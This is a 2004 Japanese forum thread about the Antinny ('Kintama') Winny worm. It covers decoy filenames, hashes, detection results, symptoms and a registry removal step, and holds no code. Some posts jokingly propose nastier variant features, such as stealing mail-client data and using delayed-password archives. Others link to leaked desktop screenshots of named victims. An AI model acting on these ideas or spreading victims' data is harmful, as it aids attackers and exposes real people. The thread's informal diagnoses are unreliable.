use heuristicstってのは未知のウイルスを見つける機能だから
キンタマに警告を出してもおかしくはない
もし効いてるんだったらフリーのおまけみたいな機能としては優秀だね

[スタジオ・リテイク] Charlatan
[リリーマルレーン(きのはらひかる)] In the cell (ラグナロクオンライン)
[希有馬屋]_スペルマぬるぬる副艦長
[黒犬獣(BLACK DOG)] うぇざー・りぽーと WeatherReport
[彩〜IRODORI〜] 溌
[彩画堂]アテナ＆フレンズスペシャル（冬コミ新刊）
[春風亭工房] 大嘘でぃすく4(C63 同人ソフト OP差し替え版 月姫＋ガンダムSEED)
[床子屋] なつもの。(ブラックラグーン 鋼の錬金術師)
[心交社] 「Charm」大島優子・田島穂奈美
[神葉烏龍茶] 小学性4 夏茱萸
[仙弾&光速ぷっちんプリン] うぃずっぷり (ラグナロクオンライン)
[池袋DPC] White Impure Desire vol.2
[直道館] われぱら。WAREMEKKO PARADISE!
[釣りキチ同盟] 賎婦〜せんぷ〜
[釣りキチ同盟] 梅玉ンガ集GO (ヴァンパイアハンター)
[貞本義行] N2 BOMB 貞本氏本人によるエヴァカラーエロイラスト_高解像度
[天野雨乃] FFX-M（FFXユウナ）
[猫禁猟区] ねこねこ曜日 らくがきほん。
[白液書房] カリスマ変態女子○生露出戦記 (ときめきメモリアル)
[尾崎未来] イジワルナ天使ヨ 世界ヲ笑エ!
[片励会] アミホタ!! side：b 〜蛍姦2〜 (セーラームーン)
[万] [スタジオKIMIGABUCHI] ガイナ祭 (ナディア・エヴァ・トップを狙え)
[無差別爆撃] 珍宝(メズラシイタカラ、ふたなり)
[夜間飛行][ROUTES] FOUL THREE R
[有料サイト][美少女ヌード写真集][TOKYO★247][MAXI★247] ひろみ

[恋愛漫画家] Magic For You ! (Fate)
[眞嶋堂] 鳴海 [ワンピース]
[翡翠亭] えがおのむこうで (ラグナロクオンライン)
globe - 8 Years〜Many Classic Moments〜
mp3
ringkilling (くらぎ)］(ゆめりあ) りありあ
t．A．T．u． - t．A．T．u．
w-inds〜PRIME OF LIFE〜 - w-inds
（聖リオ) ちょびっツ_AVIVA2
〔スタジオKIMIGABUCHI えんとっくん〕ジャジャジャジャジャぱん1〜3（焼きたて！！ジャぱん）
「PurePure Vol6」 黒川芽以 長澤まさみ 石田未来 宮崎あおい 末永遥、他
お菓子系アイドルセーラー服ブルマスクール水着画像集
か[甲 h娘]国宝定食　(サムスピ KOF FF10 行殺新撰組)
これでなかったらあきらめろ
さとう玉緒 まだ無名時代のヌード。結構乳輪でか！
さとう珠緒 ヌード写真
さとう珠緒　ヌード
ゆず - すみれ
アップデート
アプリ
アルバム
アヴリル・ラヴィーン - レット・ゴー
イン・ザ・ゾーン - ブリトニー・スピアーズ
インターネットでパスワードがかかって入れない所をクラックする方法
ウイルスバスター 2003 のクラックパッチはトロイだよ(詳しくは読め)

そんなの全部知ってなんか意味あるのか？
偽装ファイル名を知ったところでなんの役にも立たないと言うことが
とっくに言われているわけだが。

頭悪すぎ。

DOWNフォルダにあるファイルにもウイルスつけてUPするような気がする。このリスト当てにならない？

クラック
グレイテスト・ヒッツ - レッド・ホット・チリ・ペッパーズ
ケツメイシ - ケツノポリス3
コスプレ
コスプレさちえDefeatAngel没写真
コスプレ写真
コスプレ写真集
コスプレ写真集 (同人) パンチラ 乳首スケetc
ゴスペラーズ - アカペラ
サクラ大戦３　 OUTLET ７ 　好実昭博 （DIFFERENT）
シリアル
シリアル集
シリアル集＆クラック集
スイカップ!（ＮＨＫ山形）古瀬絵里
スタジオKIMIGABUCHI BLACK EARTH
ステイシー・オリコ - ステイシー・オリコ
スピグラNET 八幡えつこ・原田由美子・上戸彩・小野愛・周防玲子・釈由美子・三津谷葉子・細田あかり・根本はるみ・乙葉・磯山さやか・PGIRL・石田未来・上野なつひ
スプリンター - オフスプリング
ツール
ナウ&フォーエヴァー-ザ・ヒッツ - TLC
ハッカー御用達
パイパン 剃毛写真集
パスワードのかかっているZIPを解凍する方法
パスワード付きZIPのパスワードを解読するツール
ピチレモン - 宮崎あおい 黒川芽以 長澤まさみ 栗山千明

まぁWinnyなんぞ使わなければいいだけだが。

ゴミ投稿で貴重な情報流すんじゃねぇよあほが。

泥棒が下らん正義感に駆られるとこうなる見本

>>117
作者に何を言っても無駄

もはや荒らし。

キンタマウイルスを主なアンチウイルスソフトに食わせてみたときの結果は？

ろくにログも読まない奴ばかりだな。

けっきょくセキュ板独自の解析は皆無か・・・

バカばっかｗ

↑お前もな（藁

シィマンテック　Antinny.ω駆除ツールキタぞ━━(゜o、。)━━━━━！！


>W32.HLLW.Antinny.ω 駆除ツール 　　　最終更新日: 2004年3月19日 10:13


>Sｈymantec Security Response は、W32.HLLW.Antinny.ω の感染を除去する駆除ツールを開発しました。

>W32.HLLW.Antinny.ω 駆除ツールは、次のことを行います。

>1. W32.HLLW.Antinny.ω の有害プロセスを停止させます。

>2. W32.HLLW.Antinny.ω ファイルを除去します。

>2. 改変されたレジストリ、ファイルを修復します。

>4. Winnyのキャッシュファイルを削除します。

>5. Winnyを削除します。


>このツールで利用可能なコマンドライン スイッチ

>>126
ついでにお前も削除してもらえ春厨

>>126
しばくぞ、こら

>>126の愛車
http://no.m78.com/up/data/u029765.jpg
http://members.jcom.home.ne.jp/dearest/RR.jpg

まだ亜種があるし、動作も条件も不確定なのが多いから安心するのには早いと思うんだけどなぁ。

ノートン今日も更新あったね
毎日更新だね。なんとなく毎日うｐだてチェックするのが楽しみだよ。（・∀・）

CRC16:CFB7
しか捕獲してなんだけど他の誰かうぷって〜

ny動かすのｲﾔｿｗ

あ、ちなみに
CRC16:CFB7
起動してたら同じCRCのexeと
CRC:A76B
の同じ機能っぽいexeができてさ･･･
デスクトップのSSはないね

勘違いか･･･

CRC16:CFB7
CRC:A76B
２つのexe捕獲してたっぽい

DeDeでCRC:E837を開いたら、
プロジェクト名winozって自動的に表示。
CRC CFB7も。
なお、CRC CFB7をDedeで選択、プロセススタート
すると、感染しますた。見事にスタートアップに
登録されます。ですから、ファイル、レジストリキーともに削除必須です。

>>134
直接起動→空のフォルダ作成＋感染
間接起動(htmlとか)→ファイルサイズが変化したキンタマ？＋α作成＋感染
のような気がする

SSは時間を置かないと出来ない。少し放置してみた？それとも違うウイルスか？
ｄｌｌも無いと圧縮ファイル作らんし

ＳＳはどこのフォルダにつくられるの？

Upfolder.txtにウイルスが新しく共有フォルダとして登録したとこ

今回の金玉はあれだな、アンチウィルス系の会社がばら撒いたんじゃないから
対策がえらく遅いな（ｗ

ウイルスは自作自演だなんていうこと言う人がまだ居るとはね。

http://www.gazo-box.com/misc/src/1079613749390.jpg

中には兵器として作られたものもあるけど、９９．９％は自然に変異して出来たもの

>>140
真に受けてるって…

キンタマ踏んだＹＯ！
[キンタマ] ω詰め合わせ＞おまけ.exeっての
ダウン.ｔｘｔを不可視にして○○フォルダ追加
単に増殖する奴みたいでSSはキャッシュにも無い
ｃ/ぷろ/intel/winlogon.exeが本体でフォルダ偽装のまんま
なんかよく判らん.・・

44 名前：名無しさん＠お腹いっぱい。 投稿日：04/03/19 09:36
出たね。。eTrustオンラインウィルススキャン

http://www3.ca.com/threatinfo/virusinfo/scan.aspx

ここのスキャンCRC:E837のヤシに反応したよ

eTrustオンラインウィルススキャン

http://www3.ca.com/threatinfo/virusinfo/scan.aspx
しかし、CRC16:CFB7
は未検出

これってさ常駐するわけじゃなさそうなんだけどどうなのかな？
ﾃﾞ馬鹿で追おうにもどれかわかんない･･･

あとDeDeなくしたしﾀﾞｳｿできないじゃんorz

>>147
サブのマシンでデバッガ起動でウィルスインストールしてみた。
ある程度のことはわかるんだけど、いかんせんスキル不足・・・
あいまいな情報流せんからやめとくけど、こりゃちょっと難しいと思われ･･･

妹がキンタマを踏みました。

>>148
なんとなくわかってきたよ･･･

引数あるときに動作して
無い時は拡大　って感じだね

>>149
お前のキンタマ？

>>147
DeDeなんてすぐ見つかる

DeDe使ったら感染したって、そりゃデバッグしたからでしょ？
ただ逆コンパイルするには何もならんでしょ

>>149
おまいの玉なんて踏むほどないだろw

CRC16:40E4のファイルって初代Antinny?

>>155
初代はC173。

そうっすか、、eTrustでAntinnyと診断されたもので

俺が持っているAntinnyはそうだった。
ファイルサイズは651,264バイト？

>>158
そのサイズです。初代の亜種(?)みたいですね。

藻前らは何でCRC16なんだ
俺はMD5が好きなんだが

>>159
それ、Antinny.Aだよ。
今Winny起動してAntinnyを検索したけど、一つ一つファイルサイズは
一致するけどハッシュが違うわ。

zipファイルに予め書き込まれてるのがCRC16/32だから。

じゃあせめて32bitでおながいします
CRC32/MD5のソフトはあるけど、
CRC16付きとなると使い勝手悪いのよな・・・

せっかくのnyの話題なのになぜハッシュで書かないのかと

単体で流れてる事よりも何かのファイルにアーカイブされてることが多いから

すいません、教えてください。
Upfolder.txtと言うのがどこにもありません。
大丈夫でしょうか？

駄目

>>160
CRC16の方が短くて覚えやすい。
MD5並べられても何のことだか人間が識別しにくい。
CRC16なら四文字だから人間が書くとき間違えにくくなる。

＞MD5並べられても何のことだか人間が識別しにくい。
釣れますか？

＞四文字だから人間が書くとき間違えにくくなる。
コピペしろよ

おまいらもちけつ

>>168
あはは
生きる時代を間違えたなおまいは

>>171
931993D01E4573D7C796BD09784527BE
8ED40E522908DE4C7F09C324AB267916
2012CE213D4EDD0EEA21DA0BF97E817D
246A7C8BFABF412AB5A86204DD932962
9473500A73BE811A2D652A8B5961DF33
34773743640C098F29F5D043C2E348F4
7B1E200CF92DFE71083C165F7712BF37
4D916F9C2BAA51543D3C3E5E4D0BA4AC
7D880C0A758D6A8A8AEC4D0BEBA8DD29
48B6F3169CEAFBE23F38001C692E4B23
CAA04BB229CB9F3D70FFD19A6E2508F3
3013626A99094B3DB3EBB14C06D56670
67C8170C13BD9B7B39F50ACD28E2710C
D7E8EC7813FD5CF64EF03AF4BE6434D9
183D147F62A9E52CBE8CD9577A6A907F
D3EA1A8A8E328C0E4910CE7EFF17CB63

んじゃこれやってもらおうかMD5厨クンよ。
上にある16個のMD5ハッシュを、レスの中で重複せずに
登場する順番をランダムにして全部書いてくれ。
そんとき何回コピペしたかもメモっといてかけよ。

あと、今からおまえは人に名乗るときは自分の個人情報を書いたtテキスト作って
それのMD5値で声に出して呼んでもらうようにしろ。間違いがないし情報も漏れないし
最高だよなぁ？
コピペできるんだから簡単だよな？

煽り耐性が無い人だね。

>>171
脳みそ付いてない奴は本当に救いようがないな。

>>173
>>171
931993D01E4573D7C796BD09784527BE
8ED40E522908DE4C7F09C324AB267916
2012CE213D4EDD0EEA21DA0BF97E817D
246A7C8BFABF412AB5A86204DD932962
9473500A73BE811A2D652A8B5961DF33
34773743640C098F29F5D043C2E348F4
7B1E200CF92DFE71083C165F7712BF37
4D916F9C2BAA51543D3C3E5E4D0BA4AC
7D880C0A758D6A8A8AEC4D0BEBA8DD29
48B6F3169CEAFBE23F38001C692E4B23
CAA04BB229CB9F3D70FFD19A6E2508F3
3013626A99094B3DB3EBB14C06D56670
67C8170C13BD9B7B39F50ACD28E2710C
D7E8EC7813FD5CF64EF03AF4BE6434D9
183D147F62A9E52CBE8CD9577A6A907F
D3EA1A8A8E328C0E4910CE7EFF17CB63

んじゃこれやってもらおうかMD5厨クンよ。
上にある16個のMD5ハッシュを、レスの中で重複せずに
登場する順番をランダムにして全部書いてくれ。
そんとき何回コピペしたかもメモっといてかけよ。

あと、今からおまえは人に名乗るときは自分の個人情報を書いたテキスト作って
それのMD5値で声に出して呼んでもらうようにしろ。間違いがないし情報も漏れないし
最高だよなぁ？
コピペできるんだから簡単だよな？

ｵﾏｲﾗ短気すぎですよ　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　.22歳童貞

ｵﾏｴﾓﾅｰ　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　.18歳非童貞

ｵﾏｴﾓﾅｰ .8歳処女

今偶然　whismng.exe　を発見しますた。
作成日は３日前になっているが、ＶＢには引っかからず？？？？？

キンタマに時限式でwhismng.exeを発症させる機能があるとか・・・・・・
((((((;ﾟДﾟ)))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

CRC16でもMD5でも行数が同じならコピペの回数は同じ…並び替えの手間も。

>>179
Whiterか。ウイルスバスターは検出可能だけどね。

>>180
はいはい。ここは脳みそ付いてない厨の来るスレじゃないからね。
「人間が」重複無く並べ替えるためには、対称となるものを
記憶して残りと照合しなければいけないわけだが。

脳みそ付いてない厨は1桁の数と1000桁の数を記憶するコストが同じだとでも思っているのだろうか？
ステップ数とコストの区別も付かないのか。
藻前の脳は一ステップで何でも出来るとでも言いたいのか？

まぁ厨っぷりから言ってそれはあり得ないわけだが。

そもそもどうしてほしいのか読解できない俺はアホなのでしょうか

変にマジになってレスしている方がいらっしゃいますね。

フォルダアイコンのwhismng.exeですた
((((((;ﾟДﾟ)))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>182
上から順番にランダムな位置へ挿入していけばそんな手間いらないだろ。
そもそも全桁覚えなくても頭の数桁だけでことたりるんじゃないの。

例えばファイルの破損チェック用途なら、「ファイル破損発生」かつ
「CRCが偶然一致してしまう」確率は十分小さいと思えるから
16bitのCRCで十分だろう。

ファイルシグネチャのように、「全部検査することなくシグネチャだけで
二つのファイルが同一かどうか判定したい」用途の場合、65535通りでは
偶然一致の確率が高すぎるのでMD5などが妥当だろう。

祭りに疲れたので普通なことを書きたくなた

ｎｙ以外では感染しないの?
そもそも何をクリックしたら感染するの?
exeファイル?　exeファイルをどうすればjpgに偽装できるの?
jpgに偽装するとしたらny以外でも広がるということだよね?
nyやってないから個人情報流出の脅威はないんだけど
破壊する亜種が流れてそれがny以外にも広がるのが怖い

誰か知ってる方いますか?

もう説明するのもダルイ。
心配ならPCの電源切ってさっさと寝ろ。

知ってるよヾ(ﾟдﾟ)ﾉ゛

runに書き込んで常駐するキンタマって、亜種の違いはあっても
どれも.exeのサイズってほぼ一定なんですか？

てかさnyのうちはいいけど
拡散したらどうなるんだろうねこれ（ｗ

てか単純に安いＰＣかってそれを
ＮＹ専用機にしちゃえば終わりだろ？
この手の問題って

その前に道で拾ったexeやhtmlを口に入れるのをやめろ

>>194
それが醍醐味でもあるからなネットて言う悪路は（ｗ
まあ最低限必要なＰＣと危険地帯を歩くＰＣくらいはわけろよって事だな

　　　　　　 　　　　　　/ヽ　　　　　　　/ヽ
　　　　　　　　　　　　/　 ヽ　　　　　 /　ヽ
　　＿＿＿＿＿＿ /U　　ヽ＿＿＿/　　ヽ
　　|　＿＿＿＿　／,,　　　U　　,,　:::::::::::U:＼
　　| |きんたま　/《;.･;》＿__　《;.･;》 　::::::::::::::|
　　| |きんたま　|　　　|　　 |　　　　　U :::::::::::| 　・・・
　　| |きんたま　|U　　|　　　|　　　　　　::::U::::|
　　| |きんたま　.|　　├―-┤　U...:::::::::::::::::/
　　| |＿＿＿＿　ヽ　　　　　.....::::::::::::::::::::::<
　 └＿＿＿／￣￣　　　　　　::::::::::::::::::::::::|
　　|＼　　　 |　　　　　　　　　　　::::::::::::::::::::::|
　　＼ ＼　 ＼＿＿＿　　　　　 :::::::::::::::::::::::::|

v7.1だとアップフォルダ作れないバグがあるから
デスクトップの個人情報は漏れないんじゃないのか？

勝手にメ−ルがｎｙやってますっつーのをどっかに送るのは
v7.1の場合どーなるんかわからんが

あほー

( ﾟдﾟ)ﾎﾟｶｰﾝ・・・・

俺のデスクトップ晒しておく
http://www.media-k.co.jp/jiten/imgbbs/img-box/img20040318200614.jpg

>>197
v7.1ユーザーはキンタマ貰ってもセーフってこと
それが本当ならかなり救われる香具師がいるわけだ

そうです。
7.1つかっとけば発症しないってのは明らかですよね。
これでアンチウイルス代かからなくてすむ〜

（ ﾟдﾟ）ﾎﾟｶｰﾝ

違うんだなーこれがむぎむぎ

【警報】Winnyを狙ったワーム・ウイルス情報 Part13
http://tmp2.2ch.net/test/read.cgi/download/1079540824/632

セキュ板まで出張してるDown板の方が多いですね

WinnyUtilみたいので監視してれば無問題

>>206
使いこなさなきゃ意味無いぞ
っつうかWinnyUtilじゃ無理だろ
俺も使ってるが・・・

>>205
元々シベリア抑留されてたんだけど、ダウソ板に召還されて、
さらにこっちにワープしてきたｗ

ＸＰ使ってるんですけど、
デフォルトのフォルダアイコンってどうやって変えるんですか？
プロパティからだと１こづつしか変わらないし、
新しいフォルダ作るといつものフォルダアイコンになっちゃてるし。
アイコン偽装ウイルスの対策したい！

>>209
レジストリいじれる自信がないならツール使ったほうがいい。
「窓の手」とかでも変えられる。

ウイルスのせいでレジストリエディタ開かないんだけどどうすればいい？

>>209
＞アイコン偽装ウイルスの対策したい
ほう

＞ＸＰ使ってるんですけど
じゃ無駄。

万引きしに行ってる間に空き巣に入られたって騒ぐヴァカの多い事

>>209
ここみるといいよ
ttp://www.ix.sakura.ne.jp/~yoshi/qanda/fol.htm

>>212
アホ？

>>213
今は東大行ってるのに万引きしに行ってる間に空き巣に入られたヴァカがいるような世の中ですよ。

NYに流れてる画像のZIP詰め合わせは
ウイルス入りなん？

もはやそう考えていいと思う
総数の中のどれだけがマジ流出なんだろうなあアレ

>IDNAME04/03/20 03:48 ID:MRKFMVkI654↓↑『[名無し]さん(bin+cue).rar』 sage
>１・UPフォルダもテキストも無い人が感染
>↓
>２・UPフォルダ追加、テキスト生成、ファイル作成
>↓
>３・起動中にこっそりハッシュ化、同時に元ファイル削除
>↓
>４・UP完了確認、ハッシュ化ファイル削除、UPフォルダ削除、テキスト削除
>
>これだったら、気がつかない人一生気がつかないままさらし者…？
>
>IDNAME04/03/20 03:57 ID:l244F9Bj655↓↑『[名無し]さん(bin+cue).rar』 sage
>>650
>システム情報で、デフォのアップフォルダ 1 とか
>アップファイル個数 0
>アップファイルキーorキャッシュキー 0 、
>あるいはキャッシュファイラーで見てそれっぽいのが無い場合は
>大丈夫なんじゃないの。と思うんだけど。思いたいんだけど。
>
>>654みたいに自分で痕跡経っていくならお仕舞いだがｗ
>感染してキンタマ詰めがアップ体制になってた人
>どうだったのかな。

怖い会話してるなー…。

Windows Updateを何回やってもｴﾗｰになるんで
これはｷﾝﾀﾏの仕業かとびびったら、なんか向こうの
鯖のせいみたいでやんの

>>213

いや、それはちょっとだけ違うこともある。
むしろ
野次馬火事場見物して重度の火傷を覆ったので騒いでることもある。

作者さんここ見てたらよ、次の亜種では
JPG内に捏造防止ヘッダうめといてくれよ。
んでついでにDelphiで捏造判定ツールも作って流す。
ここらへんは電子署名使えば出来るだろ。
あと、ＡＣＣＳ＆京都府警への自動通報機能。
他にはベッキー・Eudraなどの主要メーラー1〜５位くらいまでの
情報をレジストリから抜いて添付する機能。

こんくらいやれば祭りがもっと長続きするんじゃないかな。

でもさ、殺人犯を無関係の人が殴ったら暴行傷害罪なんだよね

それと同じでウイルスの作者は訴えられたら負けるよ
重要機密が漏れていたら莫大な損害賠償がくるので注意なｗ

あと血しぶきとか自覚症状が出るものはやめるんだ。
気づかずに長期間晒させた方が効果は高いだろ。

最良の策としては、暗号化ZIPでキンタマを放出し、
かなり長い間放っておく。この場合ファイル名には情報は書かない。
で、パスワードをある日から突然流し始める。（パスワードは●月●日に放流します）
みたいな文句をファイル名に入れておく。

これで厨に最大に被害を与えることが出来るぞ。

んで、224がかかったらﾜﾗｳw

もちろんキンタマ放流はキャッシュ化して即本体を消すってことで。
放流物に名前書かなくても、あとで捏造防止ヘッダを内蔵した
ものをリパックしていろんな人が流してくれるから安心するがいい。

>>223
このウイルスって今のところ刑法に触れるかな？
損害賠償は訴える相手が不詳だと出来ないんで刑事で
罪に問う必要があるぞ。

>>225
所有者名・組織名は共に全角スペース、エクスプローラーは
必ず隠しファイルも拡張子も表示させて、フォルダに見えてもダブルクリックする前に必ず
ファイルサイズを確認。右端に省略の...が見えてないかどうかチェック。

ってくらいはデフォルトでいつもやってるからな。

でもさすがにメーラーには実名とか入ってるからどうしようかな。
メーラー内部のレジストリの名前と実際のレジストリの位置を
バイナリエディタで改造して、改造exeと改造レジストリがペアにならないようにしとくか。
これなら全メーラーのレジストリ抜く凶悪なトロイ踏んでも何とかなる。

あ、レジストリ全部持って行かれたら同じか…ｗ

泥棒（ｎｙ厨）が色々と防犯（セキュ）の盲点や手段を公開してくれるから、
自警団、もしくはそれを装った空き巣狙い（嫌ｎｙ厨=ウィルス作者）が
喜んでる罠

＞改造exeと改造レジストリがペアにならないようにしとくか

改造exeと改造レジストリがペアにならないと機能しないようにしとくか

ですた。

>>229
ネトラン厨が消えるので喜ぶ奴も多いかと。
利害の一致か！？ｗ

ていうか所有者名に実名入れてnyやってるってのは池沼としかおもえんな…

今までそこの文字列を抜くウイルスなんて蔓延したこと無いんだから仕様が無い。

マイドキュメントでやってる奴もいるからでしょ。

>>213
痛みわけって事でどん底ではないよな。
まあ俺は勝ち組だけどな

antiny G　だってさｗ

ttp://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.antinny.g.html

ノートン先生きたね。
Attempts to delete the files on the C drive.ってあるけど、こんな報告あったっけ？

>>237
(･∀･)ｺﾝﾆﾁﾊ!!

a,b,c・・・ときてｇなのかと思ったら
eはあるがfは無いんだね。
こりゃ本当にGoldのＧだｗ

まんまん

>>237
ごみ箱アイコンのやつはどうなってんの？

>>237
時限式に入ってるじゃないの？

結局Gになったのかｗ
ぬるぽとは別ものだから、別の名前になるかと思ってたけど、
ｎｙで広がるワームってことでまとめられちゃったのかな。

キンタマがAntinny.Gなら感染力は高だと思うが・・・
nyで発生したウィルスをAntinnyの亜種にしてしまうベンダ会社がむかつく
そもそもキンタマとぬるぽに使っている言語自体が違う訳だが
そりゃ変な名前のウィルスが多いが・・・

こんにちは！ROユーザーのミュレです。
僕は大流行のｷﾝﾀﾏｳｲﾙｽを踏んでしまい、Winny使ってるがばれちゃいましたｗ

いたずらしないでくださいね。
http://cgi.f12.aaacafe.ne.jp/~arufach/cgi/2/obj/obj11_1.jpg

>>244
>>237を読む限りはキンタマ＝Antinny.Gで間違いないと思うよ。

>>202
あー、あー。201は釣りなので注意注意。てすてす。

いまだにぬるぽを放置している阿呆も多いんで、ウイルス作者は笑いが止まらないだろうね。

>>244
感染力は高じゃないだろ
（そもそも「感染」しないというのは置いといて）何もしなけりゃ発症しないんだし

Fを飛ばして「G」。
GはGolden Ballの「G」だったりするのかな。

どうせなら、「Antinny.GB」とかにしてくれれば分かりやすいのにね

文春もキンタマに感染したことにして真紀子の娘のネタを流せば良かったのにね（ｗ

実際に似たようなことをする香具師が出るかと思っていたがいなかったっぽいな。
リークには良いチャンスだったのに。

某ファイル　　　　　　　　　　　　　　　　　.exe


踏んでしまいますた


"C:\Documents and Settings\ユーザー名\Local Settings\Temp"
"ユーザー名.txt"も作成されてなくて

UpFolder.txt内も普段と変わりないんですけど
[BBS]
Path=C:\マイ ミュージック\Winny2b71\Winny2\Down

感染してないんでつかね？

Antinny.GBA

キンタマの本領は再起動してからだと言っておく

>踏んでしまいますた

これだけ情報が出回ってるのに、なぜ？？？
言葉もない。

256！

>>254
再起動したけど問題なかったけどホント？
>>255
踏んだの今日で踏んでから知ることになりますた・・

>>252
スタート→「ファイル名を指定して実行(R)」→「regedit」と打ち込んでｴﾝﾀｰ押した？

何故かノートパッドで開いたら(･∀･)ｺﾝﾆﾁﾊ!!

>>252
全く同じ状態。
症状がちっとも出てこないから逆に何だか恐ろしい…。

一ヶ月後にHDDが生きていたらセーフですよ

最近の流行は
ファイル名　　　　　　　　　　　　　　.exe
の放流か

HDDは生きてても社会的に死んでたりしてな

>>257
直後には影響がなくても、そのうちｼﾞﾜｼﾞﾜとキンタマが侵食していくので安心してください。

>>258

(標準)
DisplayName
ErrorControl
ImagePath
ObjectName
Start
Type

↑が出てきますた

>>259
スタートからファイルやフォルダの検索で
Antinny検索して

"C:\Documents and Settings\ユーザー名\Local Settings\Temp"
"ユーザー名.txt"
も検索でないか確認したけど何も見つからなかった・・

感染したと見せかけて実際は何も起こらないてというのも考えられる

>>264
？

>>264
感染源のファイルサイズ・タイムスタンプ・CRC16を晒してみて。

踏んで何も起きない人は、
踏んじまったexeのサイズとCRCでも確認してみれば？

これサイズって平均300前後？

>>264は全く理解していないようだ・・・。

サイズ　1.18 MB (1,238,528 バイト)
作成日時　2004年2月24日、9:01:32

CRCとタイムスタンプってなんでつか？

('A`)

>>270
ANTINNY.Bだな。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.B&VSect=T

>>270,272
ノートンなら「W32.HLLW.Antinny.E」
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.e.html

>>272-273
助かりますた

いかりや長介が…

ヌー速がすごいことになってるなヲイ

うああああああああああああ！！！！

　ミ　　　　　 　 　 ヽ
二 ノ (　 　 　 　 　 i
三 ⌒　へ　 　　/` |
二 　 　＿ 　 　 ＿ |
三 　 　┰ 　 　 ┰ |
ｌ＾　　 　　　　　　　（
｝ ! 　ヽ　／　　{＼ ﾉ
ｌ　　　　ｉ　　( ､ , )　{
∪､　　　　　　ｊ 　　|　
　　|　 ‐――――┴､
　　|　　 　￣`ー―ｧ'′　　
　　＼＿＿＿＿＿_）
　いつも心に長助を

いかつくて
かたくて
りりしくて
やさしい

そんな唇を持つ男

>>279
なんか分かるようで分からないけど、泣けてきた・・・

全然関係無い板にまでスレ立てるのはやめて欲しいね。

　ミ　　　　　 　 　 ヽ
二 ノ (　 　 　 　 　 i
三 ⌒　へ　 　　/` |
二 　 　＿ 　 　 ＿ |
三 　 　┰ 　 　 ┰ |
ｌ＾　　 　　　　　　　（
｝ ! 　ヽ　／　　{＼ ﾉ
ｌ　　　　ｉ　　( ､ , )　{
∪､　　　　　　ｊ 　　|　　　　／￣￣￣￣￣
　　|　 ‐――――┴､ 　＜　さよならはつらいけどな、あばよ。
　　|　　 　￣`ー―ｧ'′　　＼＿＿＿＿＿
　　＼＿＿＿＿＿_）

ニュー速は使い物にならなくなったし、もう寝よう。
おやふみ。

>>283　ワラタ

winny愛好家[AtaraxiA]土山nyう Part5
http://comic2.2ch.net/test/read.cgi/doujin/1079677582/

人気同人作家の土山にう先生が、ウイルスに感染したとして疑惑にかけられています
白だと証明するにはセキュリティー板のみなさんの力が必要です
ぜひ助けてください

昨日今日キンタマ以外のファイルをｎｙで落としたﾔｼ挙手

そしてバスターは今日も沈黙かー…
こんなにもトレンドが後手になるとは意外

>>285
粘着を相手にするだけ無駄。

>>285
土山にうは100%黒だよ
ｽｰﾊﾟｰﾊｶｰの俺が言うから間違いない

>>285
土山にうは100%白だよ
ｽｰﾊﾟｰﾊｶｰの俺が言うから間違いない

いやいや、土山にうは100%黒だよ
世界ﾊｯｶｰ選手権で優勝した俺が言うんだから間違い無い

04-03-13　26分離れてます。
http://2ch.jpn21.net/Imgboard/01/data/img20040320230427.jpg

04-03-15 7分（420秒）しか離れてません。
http://2ch.jpn21.net/Imgboard/01/data/img20040320230521.jpg

1416秒周期じゃないという事がわかります。
フルサイズは結構重いものなので、トリミング加工させてもらいました。

ちなみに、水瀬たすくという人のデスクトップです。
テンプレの
＞・キンタマ実行時に、乱数(多分0〜99)を発生させる。そして、その乱数×1416（秒）ごとにSSを撮ってうｐ。
は間違ってると思われます。

[キンタマ] ２ちゃんねるで話題のぺんぎん本舗とAtaraxiAの画像詰め合わセット [04-03-16].zip 23,248,477 e0dc13d019dcc48672a37a8ba697953b

この中に水瀬たすくのデスクトップ画像が全部入ってます

オタク同士で盛り上がってればイイジャン

内部で複数タスクが同時に動作してんでしょ
発想が貧困すぎっていう

知識をひけらかそうとする悲惨な人間ってどこにでもいるのね

>296
ぶっちゃけ俺もそう思うんだけどね。
ﾛｸﾞ見りゃ分かるけど、亜種とかでタイマー変更とか普通にあり得るしって言ってんのよ。
でもID:tvVGWiGMこの人その説明しても無視するから、あえて一つで討論してんのよ。
なんか釣ってるつもりっぽいけどねぇ・・・。

8日の時点で亜種が存在して、それが1416秒周期で無い事を証明しろって言いそう

うわーマジで言いそう。
亜種なんてキンタマ作者が対ｳｨﾙｽｿﾌﾄ用に
数種類作って複線張ってるなんて普通にあり得るけどな。

感染したのが別の物だと証明しろってのもありそうだな・・・

>>285
俺はこの板の古参の住人だが、「土山ｎｙう」は１００％黒だ。間違いない！！！！

土山nyうスレ面白いな。近年まれに見るループスレ。

>300
それならそれで擬似キンタマに感染したnyうのﾃﾞｽｸﾄｯﾌﾟって事になるから
どっちにしても真っ黒黒なわけですわい。

そろそろ寝るさー。ﾓﾔｼﾐ

>>302
ｷﾁｶﾞｲ電波の相手は疲れますが、ｦﾁスレとしては上級クラスｗ

これだけ状況証拠が出てますが、セキュ板の皆さんで無実を証明してください

ttp://aa4a.com/goldball/

>>305
すごいｾﾝｽを感じるページだ・・・。これでnyうも一生抱える傷ができたねぇ。

家計簿をつけている（ﾓｻﾞｲｸ処理）・3月11日
家計簿についてはノーコメント。ﾃﾞｽｸﾄｯﾌﾟに「ザ・邪魔者はVBOX」のhtmlが保存してあるあたり、VBOXへの深い憎悪を感じます。逃げて！VBOX!

やっべ久々に声出してﾜﾗﾀ。ｽｰﾊﾟｰﾊｶｰ苦戦しすぎｗ

久しぶりに除いてみますた
当初は感染者の間でも
regeditに異常あったりなかったりって情報錯綜してたんだけど

結局　[再起動]→regedit起動の手順を踏めば
確実な感染確認方法ということでＦＡ？

異常なかったヤシは感染後再起動前だったってことで・・・
再起動かけてもregedit正常だった感染報告来てますかね？

で、なんでnortonのLive updateはこないんだ？
アメリカのサイトにはあるみたいなのに

駆除方法
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。


IMJPMIG8.1
URLLSTICK.exeって怪しいですか？

>>310
